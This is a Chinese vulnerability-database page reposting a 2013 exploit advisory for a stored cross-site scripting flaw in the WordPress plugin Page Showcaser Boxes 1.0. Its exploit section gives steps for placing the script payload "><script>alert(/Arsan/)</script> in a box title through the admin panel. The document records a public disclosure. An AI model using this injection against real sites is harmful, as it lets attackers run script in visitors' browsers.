WordPress Page Showcaser Boxes 1.0 Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044407 漏洞类型
发布时间 2013-09-19 更新时间 2013-09-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090139
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: WordPress Page Showcaser Boxes 1.0 Cross Site Scripting
# Date: 2013 18 September
# Author: Arsan
# Vendor Homepage: http://wordpress.org/plugins/page-showcaser-boxes/
# Version : 1.0
# Tested on: Linux & Windows
# Category: webapps
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# 	[-] Description :
#	
#	    1) Download "Page Showcaser Boxes" And Install
#	    2) Create New Box ~> Follow this link :
#	       http://localhost/wp/wp-admin/post-new.php?post_type=showcaserboxe
#	    3) Insert In Title This Code And Publish :
#	       "><script>alert(/Arsan/)</script>
#	    4) And Try To See Your Page; Follow Link :
#	       http://localhost/wp/?post_type=showcaserboxe&p=[Number Post]
#	       Or
#	       http://localhost/wp/?showcaserboxe=alertarsan
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
#     Arsan.Blackhat@gmail.com
#     Twitter.com/ArsanBlackhat
# 
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#